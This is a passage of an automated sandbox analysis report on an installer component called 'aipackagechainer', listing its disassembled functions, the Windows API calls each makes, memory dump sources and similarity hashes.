CloseHandle.KERNEL32(?), ref: 00275AFA
GetLastError.KERNEL32 ref: 00275B04
CreateSemaphoreW.KERNEL32(00000000,00000000,00000003,00000000), ref: 00275B25
GetLastError.KERNEL32 ref: 00275B32

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CreateEvent$CloseHandleResetSemaphore
String ID:
API String ID: 3310109588-0
Opcode ID: 78a242fd0f0b36ada4e2f61a916eadd56ebe405750218fae14199b51082256e4
Instruction ID: 8dcde2eb72659ad6ee13c6dc0bdfc8a3217ac57204040f056cd8fe4556acdc4f
Opcode Fuzzy Hash: 78a242fd0f0b36ada4e2f61a916eadd56ebe405750218fae14199b51082256e4
Instruction Fuzzy Hash: 5C214D70321B129BEB609F66DC59B27B7E8EF40745F108429E95AD6280EBF4E8108B64

Function 0027B319 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0027B320
std::_Lockit::_Lockit.LIBCPMT ref: 0027B32A

Part of subcall function 00218F60: std::_Lockit::_Lockit.LIBCPMT ref: 00218F90
Part of subcall function 00218F60: std::_Lockit::~_Lockit.LIBCPMT ref: 00218FB8

codecvt.LIBCPMT ref: 0027B364
std::_Facet_Register.LIBCPMT ref: 0027B37B
std::_Lockit::~_Lockit.LIBCPMT ref: 0027B39B

Strings

px-, xrefs: 0027B335

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID: px-
API String ID: 712880209-159981257
Opcode ID: 1a4482814c35d3a6712267dd511b9925708f4bfda3758b50a5b237604647e790
Instruction ID: 04a9e1fbe07bfbe69195c6fc7ffa0130e5accdae68d21e45f31bf1c0cfe51df7
Opcode Fuzzy Hash: 1a4482814c35d3a6712267dd511b9925708f4bfda3758b50a5b237604647e790
Instruction Fuzzy Hash: FB210B76920214DFCB01EF64D885AAEB7B5BF84320F24801AF818AB381DF709D55CB91

Function 0028D644 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,0028D751,4938EAB5,0024CF81,00000000,00000000,00000000,?,0028D99C,00000021,FlsSetValue,002B2A8C,002B2A94,00000000), ref: 0028D705

Strings

api-ms-, xrefs: 0028D69B
ext-ms-, xrefs: 0028D6AF

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 90aae6d364ad75c51ee29a8ee9ed40a2e958a70061954bfa01741e7d7aec0bc4
Instruction ID: 2ad2738d5392486daa7e38aa67c1682672c104777b003e4caa3e9d0ae19bbf18
Opcode Fuzzy Hash: 90aae6d364ad75c51ee29a8ee9ed40a2e958a70061954bfa01741e7d7aec0bc4
Instruction Fuzzy Hash: E421DB39913226ABC7216F25FC44A5A776DEF42760F250124E909A71D0FB70ED25CBD0

Function 00278CC0 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00278CDA

Part of subcall function 00277B30: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00277B8F
Part of subcall function 00277B30: GetLastError.KERNEL32 ref: 00277B9A

SetEvent.KERNEL32(?,?,74DEE010,?,?,74DF3080,00279091,?), ref: 00278D0A
GetLastError.KERNEL32(?,74DF3080,00279091,?), ref: 00278D1A
SetEvent.KERNEL32(?,?,74DF3080,00279091,?), ref: 00278D22
GetLastError.KERNEL32(?,74DF3080,00279091,?), ref: 00278D2C
EnterCriticalSection.KERNEL32(?,?,74DF3080,00279091,?), ref: 00278D46
LeaveCriticalSection.KERNEL32(?,?,74DF3080,00279091,?), ref: 00278D62

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CriticalEventSection$EnterLeaveObjectSingleWait__alloca_probe_16
String ID:
API String ID: 2730365815-0
Opcode ID: d4781e0b5c282e4e63d24d696d5858bf83e25fbbf4c4a5e5a7199442f50a76ef
Instruction ID: 8066c7cca3eecedff48b257bddfd20e5fbf10e632062da6f3219c4508f2ced15
Opcode Fuzzy Hash: d4781e0b5c282e4e63d24d696d5858bf83e25fbbf4c4a5e5a7199442f50a76ef
Instruction Fuzzy Hash: 9F11AF31A10705DBDB209F79D888BA6B7E9FF58310F11891EE94ED3200DB30AC118B65

Function 0024FE60 Relevance: 10.5, APIs: 7, Instructions: 44sleepwindowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000040A), ref: 0024FE75
SetWindowTextW.USER32(00000000,?), ref: 0024FE7D
GetDlgItem.USER32(?,0000040B), ref: 0024FE8B
SendMessageW.USER32(00000000,00000410,00000002,00000000), ref: 0024FE9D
ShowWindow.USER32(00000000,00000000), ref: 0024FEAC
Sleep.KERNEL32(000000C8), ref: 0024FEB3
ShowWindow.USER32(00000000,00000001), ref: 0024FEBC

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$ItemShow$MessageSendSleepText
String ID:
API String ID: 106862907-0
Opcode ID: 11fe18c6eeb28eda6934df22d35d03b53ee11fab6958300c59a65f7e624c7e04
Instruction ID: 3b79387c09ee8bf75d8692e3e435ec02f220a21ad16ebb3ff062a1adab20961e
Opcode Fuzzy Hash: 11fe18c6eeb28eda6934df22d35d03b53ee11fab6958300c59a65f7e624c7e04
Instruction Fuzzy Hash: 22016272640301ABEF105B54EC8DF3B7B29FF8AB11F15445DF701AB1A0CBB198128B65

Function 002253C0 Relevance: 9.3, APIs: 6, Instructions: 324memoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,4938EAB5), ref: 00225431
GetProcessHeap.KERNEL32(?,00000000), ref: 00225546
HeapFree.KERNEL32(00000000,?,00000000), ref: 0022554C
GetProcessHeap.KERNEL32(?,00000000), ref: 002255DF
HeapFree.KERNEL32(00000000,?,00000000), ref: 002255E5
CoUninitialize.OLE32 ref: 00225768

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Heap$FreeProcess$InitializeUninitialize
String ID:
API String ID: 4239879612-0
Opcode ID: 3220728dec29b6c0dba17cfe67197a8421d687aef0ae331134c3d7bb07341fc9
Instruction ID: 52ff69bc10299f8f60b0551a13dce18ab28ecde4c36a1efa6d4bb0969b2e6ff8
Opcode Fuzzy Hash: 3220728dec29b6c0dba17cfe67197a8421d687aef0ae331134c3d7bb07341fc9
Instruction Fuzzy Hash: EDD19C70D10629EFDB24CFA8D844BEDBBB5BF45304F20829DE009A7292DB749A94CF51

Function 00299C34 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2054899641890bd263a13b6cc6b7a444b7f55d871dfec703dd2ec906c0198697
Instruction ID: d522151646352d008612e86458b7bb6d5e4e9c98b1f60e7bc9958a5af9acbe41
Opcode Fuzzy Hash: 2054899641890bd263a13b6cc6b7a444b7f55d871dfec703dd2ec906c0198697
Instruction Fuzzy Hash: 93B12470A24246AFDF11DF9DC880BADBBB5AF49320F14805DE441972D2CB719DA2CF60

Function 00218780 Relevance: 9.2, APIs: 6, Instructions: 153COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002187CA
std::_Lockit::_Lockit.LIBCPMT ref: 002187EC
std::_Lockit::~_Lockit.LIBCPMT ref: 00218814
__Getctype.LIBCPMT ref: 002188F5
std::_Facet_Register.LIBCPMT ref: 00218957
std::_Lockit::~_Lockit.LIBCPMT ref: 00218981

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID:
API String ID: 1102183713-0
Opcode ID: aa522f264af99ade9d171ac9806ae145dcd0151038393317366bfd6f011ab52d
Instruction ID: 09d7b23668be3f0683b2772c50fc000ba60c6ac9f5f2897b8b3ae100070330c4
Opcode Fuzzy Hash: aa522f264af99ade9d171ac9806ae145dcd0151038393317366bfd6f011ab52d
Instruction Fuzzy Hash: FA61BF71C20249DFDB10CF68C9857AEBBF0FB24310F158259D849AB391EB74AA94CF91

Function 0021C910 Relevance: 9.1, APIs: 6, Instructions: 140COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0021C94D
std::_Lockit::_Lockit.LIBCPMT ref: 0021C96F
std::_Lockit::~_Lockit.LIBCPMT ref: 0021C997
__Getcoll.LIBCPMT ref: 0021CA61
std::_Facet_Register.LIBCPMT ref: 0021CAA6
std::_Lockit::~_Lockit.LIBCPMT ref: 0021CADE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetcollRegister
String ID:
API String ID: 1184649410-0
Opcode ID: 7aa060c729969f56e370ea0327acd7290e2500474710f6b70f527a4509dae39f
Instruction ID: d4f66a3a7b2b710833b424f3ae4b774df483335440e1e5bd331bd286164c3ca3
Opcode Fuzzy Hash: 7aa060c729969f56e370ea0327acd7290e2500474710f6b70f527a4509dae39f
Instruction Fuzzy Hash: FC516970D61208DFCB11DF98D944BEDBBB0FF54320F24805AE419AB291DB74AA55CF91

Function 0022F8C0 Relevance: 9.1, APIs: 6, Instructions: 130COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?,?), ref: 0022F8FB
CharNextW.USER32(00000001,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F91B
CharNextW.USER32(00000000,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F92B
CharNextW.USER32(00000027,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F934
CharNextW.USER32(?,?,00000000,00000000,74DEF360,?,0023051F,00000000,00000000,?,?,?,00000000,00000000,002307C3,?), ref: 0022F9A0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 30507d1d7db6a94e884b921ca14e1fc6680c08cbaa9d2b0979c51c1179b91fdc
Instruction ID: 690f541d67a2c8e399701862934fd955cf7462b313aa5776c1fbdd3bdc4ccd47
Opcode Fuzzy Hash: 30507d1d7db6a94e884b921ca14e1fc6680c08cbaa9d2b0979c51c1179b91fdc
Instruction Fuzzy Hash: D6411836710222ABCB10DF68ED8467AB3F6FFC8710B86853AE8498B264D731DD51CB50

Function 0025F980 Relevance: 9.1, APIs: 6, Instructions: 102windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000425), ref: 0025F9A5
GetWindowTextLengthW.USER32(00000000), ref: 0025F9B0
GetWindowTextW.USER32(?,?,?), ref: 0025FA01
MessageBeep.USER32(000000FF), ref: 0025FA4D
GetDlgItem.USER32(?,00000425), ref: 0025FA62
SetFocus.USER32(00000000,?,?), ref: 0025FA69

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ItemTextWindow$BeepFocusLengthMessage
String ID:
API String ID: 2221317226-0
Opcode ID: c817c5cb4e2224e4cd57c19f8c47e934ff209401fa254de6e84ed4e308dd7f42
Instruction ID: 095977f463284b427fc059dd93a9e21ddf13f4d4168d9750fd1c885e616795a0
Opcode Fuzzy Hash: c817c5cb4e2224e4cd57c19f8c47e934ff209401fa254de6e84ed4e308dd7f42
Instruction Fuzzy Hash: 0F31BE71611601DFDF04EF68D999D2ABBE5FF88305B20456CF845C7260DB32A819CB95

Function 00258B30 Relevance: 9.1, APIs: 6, Instructions: 87threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00258B5B
SetLastError.KERNEL32(0000000E), ref: 00258B78
GetCurrentThreadId.KERNEL32 ref: 00258BA7
EnterCriticalSection.KERNEL32(002DACD0), ref: 00258BC7
LeaveCriticalSection.KERNEL32(002DACD0), ref: 00258BEB
DialogBoxParamW.USER32(000000D8,00000000,Function_00038720,00000000), ref: 00258C08

Part of subcall function 0027A15A: GetProcessHeap.KERNEL32(00000008,00000008,?,0024711E), ref: 0027A15F
Part of subcall function 0027A15A: HeapAlloc.KERNEL32(00000000), ref: 0027A166

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalHeapSection$ActiveAllocCurrentDialogEnterErrorLastLeaveParamProcessThreadWindow
String ID:
API String ID: 828238446-0
Opcode ID: 8e6631998e52d8978631cbcbe97e1d9792376d26a0f5c468ab5041f65f6053e4
Instruction ID: a2b2accbd9cca30b87caba08c12b5ee28ae1de48a759d23908d384b650c4d63e
Opcode Fuzzy Hash: 8e6631998e52d8978631cbcbe97e1d9792376d26a0f5c468ab5041f65f6053e4
Instruction Fuzzy Hash: 3E313371A14304AFDB10CF68EC0DB49FBB4FB05726F10465BE919A77C0DBB1A8108BA2

Function 00259080 Relevance: 9.1, APIs: 6, Instructions: 86windowCOMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,80000000), ref: 00259111
VerSetConditionMask.KERNEL32(00000000), ref: 00259115
VerSetConditionMask.KERNEL32(00000000), ref: 00259119
VerifyVersionInfoW.KERNEL32(?), ref: 0025913E
GetParent.USER32(0025867E), ref: 0025915B
SendMessageW.USER32(?,00000432,00000000,?), ref: 00259198

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ConditionMask$InfoMessageParentSendVerifyVersion
String ID:
API String ID: 2374517313-0
Opcode ID: 4f76486bbae3ac40fe3ff3f83e9cb1f583981cb020f75f48b5b4eeec7e386e48
Instruction ID: e1cf8d0554b357c78a2c30b31c27a5c279705a6c9e727ebd5e0ab676cd207090
Opcode Fuzzy Hash: 4f76486bbae3ac40fe3ff3f83e9cb1f583981cb020f75f48b5b4eeec7e386e48
Instruction Fuzzy Hash: 6D312FB0918344AFE760DF24DC4AB6BBBE8EFC9714F00491EF58897290D7B599048B96

Function 0027E110 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0027E107,0023A87C,002BC468,00000002,4938EAB5), ref: 0027E11E
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0027E12C
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0027E145
SetLastError.KERNEL32(00000000,?,0027E107,0023A87C,002BC468,00000002,4938EAB5), ref: 0027E197

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 867b2f6f13d1745617ce4b659eace0c38c22ddda399619949174b887d1334b3c
Instruction ID: 5b522bbc7b5df42bd0ace223c26a0ee28cc4d39120a693a3e6ac679afbc4de1f
Opcode Fuzzy Hash: 867b2f6f13d1745617ce4b659eace0c38c22ddda399619949174b887d1334b3c
Instruction Fuzzy Hash: 94014C3663A3126FAE343BB5BC8F5162B58EB05372321826AF52C550E0EF714C719660

Function 00277940 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?,?,?,00279041), ref: 00277952
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,00279041), ref: 00277962
GetLastError.KERNEL32 ref: 0027796F
ResetEvent.KERNEL32(?), ref: 00277987
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00277997
GetLastError.KERNEL32 ref: 002779A4

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Event$CreateErrorLastReset
String ID:
API String ID: 3053278375-0
Opcode ID: a9235251d2629712c9e77e7d030eae986adc5b5fc98be93c55f467fb08dd9ad3
Instruction ID: 9ccf5f8dbb6e42f9846cd76ff3e9ec31e2ca7651d48656e27ff6e6f41fdf6b73
Opcode Fuzzy Hash: a9235251d2629712c9e77e7d030eae986adc5b5fc98be93c55f467fb08dd9ad3
Instruction Fuzzy Hash: E401443036A703DBEF645A3AAC19B6672D86F40711F114529FE0AD62D0FBB0EC024924

Function 00279150 Relevance: 9.0, APIs: 6, Instructions: 37synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(00000002,?,?,0027341F,4938EAB5), ref: 00279166
GetLastError.KERNEL32(?,?,0027341F,4938EAB5), ref: 00279170
WaitForSingleObject.KERNEL32(?,000000FF,?,?,0027341F,4938EAB5), ref: 0027917C
GetLastError.KERNEL32(?,?,0027341F,4938EAB5), ref: 00279187
CloseHandle.KERNEL32(?,?,?,0027341F,4938EAB5), ref: 00279191
GetLastError.KERNEL32(?,?,0027341F,4938EAB5), ref: 0027919B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$CloseEventHandleObjectSingleWait
String ID:
API String ID: 891035169-0
Opcode ID: d2b46827a725b0c8d24d2946078378f368a423594de29006f521ae1c30164fa2
Instruction ID: 1eeaa81f970eed694d82edcc2370f580fd5aeb038f8419a617739fb27158088a
Opcode Fuzzy Hash: d2b46827a725b0c8d24d2946078378f368a423594de29006f521ae1c30164fa2
Instruction Fuzzy Hash: 5CF012346103034BEA205F7ABC4CA56B3DCAF91330B568A19E469D2290DBB5EC618A30

Function 00256740 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 245fileCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 00256774

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

DeleteFileW.KERNEL32(?), ref: 00256819
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0025694C

Part of subcall function 002367F0: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,4938EAB5,00000001,75A8EB20), ref: 0023683F
Part of subcall function 002367F0: ReadFile.KERNEL32(00000000,?,000003FF,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,4938EAB5,00000001,75A8EB20), ref: 00236870

Part of subcall function 00237780: LoadStringW.USER32(000000F5,?,00000514,4938EAB5), ref: 002377D6

_wcsrchr.LIBVCRUNTIME ref: 00256888

Strings

--verbose --log-file="%s" --remove-pack-file "%s" "%s", xrefs: 002567CE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$Delete_wcsrchr$CreateHeapLoadProcessReadString
String ID: --verbose --log-file="%s" --remove-pack-file "%s" "%s"
API String ID: 2917987377-3685554107
Opcode ID: 8d8b241109861984cce781f83c0489d88367a692126084cbc53e163168d08fb7
Instruction ID: aa006de9a925d2a2986f90d35be19ec4b13b1eb5fbccf68a7ddf265081a20d4d
Opcode Fuzzy Hash: 8d8b241109861984cce781f83c0489d88367a692126084cbc53e163168d08fb7
Instruction Fuzzy Hash: E191A071A0064A9FDB00DF68C849B9EFBB5FF45325F1482A9E815DB292DB31DD18CB90

Function 00234E40 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 178COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,4938EAB5,?,?,?,?,?,?,?,?,?,?,?,?,002A202F,000000FF), ref: 00234E8B
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,002BC42C,00000001,?,?,4938EAB5), ref: 00234F4A
GetLastError.KERNEL32(?,4938EAB5), ref: 00234F58

Strings

\\?\, xrefs: 00234AE6, 00234C37, 00234C3D
\\?\UNC\, xrefs: 00234B4F, 00234BC8, 00234BCE

Memory Dump Source

